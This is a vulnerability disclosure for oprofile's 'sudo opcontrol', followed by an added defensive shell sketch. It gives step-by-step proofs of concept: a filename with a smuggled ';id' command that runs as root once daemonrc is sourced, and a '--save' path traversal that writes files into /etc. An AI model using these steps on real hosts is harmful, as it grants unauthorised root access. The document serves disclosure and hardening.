I just found 2 more ways to execute arbitrary commands via sudo opcontrol
################# Method 1 ##################
The problem is in the function do_save_setup(), where multiple values
are saved in the shell script /root/.oprofile/daemonrc.
That file is sourced in do_load_setup() by later invocations of opcontrol.
The function do_save_setup() does not sanitize the values and thus
allows do_load_setup() to execute arbitrary commands.
There is even a comment in do_load_setup that indicates that the method
is known to be insecure.
Here is a possible method using the --vmlinux option:
(1) create a fake vmlinux file with a 'malformed' name
# touch "$HOME/abcd;id"
(2) start the oprofile daemon using that vmlinux file. This creates the
daemonrc file
# sudo opcontrol --vmlinux="$HOME/abcd;id"
(3) Any invocation of opcontrol will now source the malformed daemonrc
file as root.
# sudo opcontrol --stop
uid=0(root) gid=0(root) groups=0(root)
Daemon not running
(4) The daemonrc file can be cleared with
# sudo opcontrol --no-vmlinux
The same trick can probably be used with the --session-dir and --xen
options.
################# Method 2 ##################
The --save=name option moves samples/current to samples/name in the
current session directory.
A proper combination of --session-dir and --save can be used to copy a
file to any location.
The following example shows how to create a file /etc/XXX
(1) Create a 'samples' directory
# mkdir -p /tmp/xxx/samples
(2) Create a file named 'current' in that directory
# echo "my_commands" > /tmp/xxx/samples/current
(3) Set the oprofile session directory to the root of the 'samples'
directory
# sudo opcontrol --session-dir=/tmp/xxx
(4) Execute --save with a path relative to the 'current' file
# sudo opcontrol --save=../../../etc/XXX
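
The following is an added example, not part of the original report and not opcontrol's own code: a sketch of how a shell script can avoid both problems, by reading the saved setup as data instead of sourcing it (Method 1) and by accepting only a single path component as a save name (Method 2). The function names, the CFG_ prefix, the key allow-list and the sample values are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not opcontrol code: function names, the CFG_ prefix and the
# key allow-list are assumptions made for illustration.

# Method 1: read the saved setup as data. Nothing is sourced or eval'd, so a
# value such as "/home/u/abcd;id" stays an inert string.
load_setup_safely() {
    while IFS='=' read -r _key _value || [ -n "$_key" ]; do
        case $_key in
            VMLINUX)     CFG_VMLINUX=$_value ;;
            SESSION_DIR) CFG_SESSION_DIR=$_value ;;
            XENIMAGE)    CFG_XENIMAGE=$_value ;;
            *)           ;;   # unknown keys are ignored, never executed
        esac
    done < "$1"
}

# Method 2: a --save name must be one path component, so it cannot step out
# of <session-dir>/samples/.
valid_save_name() {
    case $1 in
        ''|.|..|*/*) return 1 ;;
        *)           return 0 ;;
    esac
}

# Constructed sample input mirroring the values used in the report.
demo() {
    _rc=$(mktemp) || return 1
    printf '%s\n' 'SESSION_DIR=/var/lib/oprofile' 'VMLINUX=/home/u/abcd;id' > "$_rc"
    load_setup_safely "$_rc"
    rm -f "$_rc"
    printf 'VMLINUX is the literal string: %s\n' "$CFG_VMLINUX"
    for _n in run1 ../../../etc/XXX; do
        if valid_save_name "$_n"; then echo "accept: $_n"; else echo "reject: $_n"; fi
    done
}
demo
```

The writer side needs no quoting tricks once the reader never evaluates the file; values containing newlines would still have to be rejected before saving.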